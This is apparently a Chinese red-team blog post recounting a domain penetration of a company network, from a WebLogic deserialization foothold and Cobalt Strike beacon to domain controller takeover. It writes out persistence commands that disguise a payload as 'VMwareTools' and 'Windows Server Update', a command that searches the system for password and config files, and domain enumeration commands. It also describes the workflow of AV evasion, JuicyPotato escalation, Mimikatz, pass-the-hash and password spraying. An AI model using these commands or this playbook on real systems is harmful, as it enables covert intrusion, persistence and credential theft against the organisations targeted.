作战前期

在一次渗透中,打算遇见域环境的话不能靠窃取进程这种骚操作来打,只能使用域渗透的姿势:委派spn … 这些操作来打。

规划

要求:拿到内网核心数据,以及人员架构,梳理分析,域内成员分析
c2 准备阶段,使用 poshc2CobaltStrike + 混淆免杀Metasploit + 流量混淆编码
总体分为以下阶段:

1
2
3
4
5
6
7
入口权限维持阶段
核心人员定位
重要业务定位
用户日志分析
域内后门持久化
痕迹清理
域渗透阶段

找到 Weblogic 执行命令口子

首先是找到了一个 Weblogic 的反序列化命令执行:

随后写了一个免杀一句话方便连接 webshell

通过查看进程发现有 VIPRE Internet Security 杀毒:

因为事先我就做好了免杀的 exe,随后直接 Bypass AV 后直接上线到 CobaltStrike

初步发现当前机器是一个域机器:

JuicyPotato (ms16-075) 提权到 SYSTEM


拿到 SYSYEM 权限后我立马做了一个权限维持:

1
2
3
4
5
自启动:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "VMwareTools" /t REG_SZ /F /D "C:\temp\ma.exe"

计划任务:
schtasks /create /RL HIGHEST /F /tn "Windows Server Update" /tr "C:\temp\ma.exe" /sc DAILY /mo 1 /ST 09:00 /RU SYSTEM

域内信息搜集

知道了当前是域环境,那么就对域进行信息搜集吧!
首先是查看了下当前域管有哪些:

1
2
3
4
5
net group "domain admins" /domain

Administrator BLombardo caroot
CThomas dbagent EFisher
PSAdmin SMSUSER sqladmin


再查看当前域控是哪些机器,然后定位域控的 IP

1
2
3
4
net group "Domain Controllers" /domain

xxxDC1$ 192.168.0.6
xxxDC2$ 192.168.0.13


由于当前 ip10 这个网段,而域控是 192 这个网段,猜测会有多网段:

由于当前进程是有域管进程的,可以直接拿到域控,我之前写的文章也讲过怎么拿,在这里几句不多阐述。

由于不能用进程窃取这个骚操作拿到域控,那按照老传统来打吧!
由于当前机器是 Windows 2012 不能直接抓到明文,只能获取到 Hash

且当前 Hash 也解密不出来:

只能通过 Hash The Pass 这种方式来横向移动!
看了看 10 这个段的 B 段存活机器很少:

192 这个网段发现存活机器很多:

本来想翻翻敏感文件看看有没有密码文件等等,这里教大家一个单靠命令对系统文件进行搜集的技巧:

1
shell dir /s /b "*pass*" "*user*" "*config*" "username.*" "password.*"

漏洞探测信息搜集

通过对 19210 网段存活的主机探测发现有 0708永恒之蓝有以下机器:

1
2
3
4
5
6
7
8
9
10
永恒之蓝:
192.168.0.6(Windows Server 2012 R2 Datacenter 9600) stays in safety
192.168.0.13(Windows Server 2012 R2 Standard 9600) stays in safety

0708:
192.168.0.74 - SAFE - CredSSP/NLA required
192.168.0.13 - SAFE - Target appears patched
192.168.0.34 - SAFE - CredSSP/NLA required
192.168.0.28 - SAFE - CredSSP/NLA required
192.168.0.6 - SAFE - CredSSP/NLA required

至此信息搜集差不多了,进行下一步横向移动。

内网横向移动 Bypass AV

通过 PTH10 网段的机器,成功拿到了多台机器权限:(有些没成功的应该是被 AV 拦截了)


随后对这些主机进行信息搜集,看看有没有密码文件:

密码文件倒是没找到,但是看上去这个域已经被大哥来过!字典文件都直接放到目标系统,小伙子你不讲武德啊!

随后我通过 Mimikatz 抓密码,成功拿到个明文:(当前机器是 Windows 2012 看来已经被大哥修改过注册表了)

通过拿到当前密码去横向密码喷洒:


这不就横向出来了吗?大量机器密码都相同!其实域控两台密码也是这个!
由于当前内网是有 VIPRE AV 的,不能使用常规的 PsexecWMI,不然必被拦截!这个时候我使用我插件里的工具进行 Psexec:(其实有很多工具都可以实现 Bypass AV 横向 psexec 的,我只写了一个(github上的项目),有空再加上去发出来给兄弟们)



成功 Bypass 完成命令执行!既然域控(192.168.0.6192.168.0.13)的密码也是这个密码,我们也可以通过相同的密码对他们进行横向移动:


两个域控都拿到执行命令的权限了,就不上线到 CobaltStrike 了,太简单了。
CobaltStrike 这工具还是太变态了,有手就能打穿内网域,还是少用这玩意虽然方便,但是很多原理和攻击手法不懂那就 GG了,下次写实战文章我打算少用 CobaltStrike 来打内网,尽量让 XD 们都了解内网域渗透的攻击手法和原理!

公众号

若有好的建议和合作可以通过公众号与我联系!
微信公众号:渗透攻击红队